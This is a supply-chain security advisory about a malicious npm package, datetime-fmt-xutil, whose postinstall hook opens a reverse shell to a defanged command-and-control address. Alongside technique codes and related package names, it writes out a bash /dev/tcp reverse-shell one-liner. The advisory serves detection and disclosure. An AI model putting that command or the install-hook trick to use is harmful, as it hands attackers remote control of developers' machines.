datetime-fmt-xutil@1.0.0
Malicious code in datetime-fmt-xutil (npm)
T1059.007 · JavaScriptT1059 · Command and Scripting InterpreterT1105 · Ingress Tool TransferT1071.001 · Web Protocols
Analysis
The postinstall hook (postinstall.js) opens a reverse shell to 8[.]135[.]48[.]40:4444 at install time, trying three methods in order: a Node net socket piping /bin/sh, bash -i >& /dev/tcp/8[.]135[.]48[.]40/4444, and a python3 pty spawn. On failure it HTTP GETs hxxp://8[.]135[.]48[.]40/shell/failed?err=[.][.]. to report back to the C2. The main index.js is a decoy date-formatting function.
- analyzed by
- Leitwacht
- first seen
- Aug 13, 2026, 01:43 PM
- analyzed
- Aug 13, 2026, 01:43 PM
Related advisories
- check-audit@99.9.1
- mutex-forge@2.0.1
- kit-map-vim@1.0.0
- dakumangalsingh@1.0.0
- kit-vim-map@1.0.0
- dayjs-advanced@1.2.0
- hex-encode-utils@1.0.5
- godot-kit@1.0.1786316795
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.